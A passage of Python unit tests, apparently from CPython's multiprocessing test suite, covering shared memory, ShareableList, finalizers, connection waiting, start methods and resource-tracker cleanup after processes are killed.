smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on Windows platform; shared
# memory will only be released once final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[4] = 'far too many'
self.assertEqual(sl[4], 'some')
sl[0] = 'encodés' # Exactly 8 bytes of UTF-8 data
self.assertEqual(sl[0], 'encodés')
self.assertEqual(sl[1], b'HoWdY') # no spillage
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[0] = 'encodées' # Exactly 9 bytes of UTF-8 data
self.assertEqual(sl[1], b'HoWdY')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[1] = b'123456789'
self.assertEqual(sl[1], b'HoWdY')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
self.assertTrue(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# killing abruptly processes holding reference to a shared memory
# segment should not leak the given memory segment.
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with threading_helper.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
@hashlib_helper.requires_hashdigest('md5')
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
@hashlib_helper.requires_hashdigest('md5')
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((socket_helper.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['spawn', 'fork'] or
methods == ['fork', 'spawn', 'forkserver'] or
methods == ['spawn', 'fork', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
# The pid should be None in the child process, expect for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
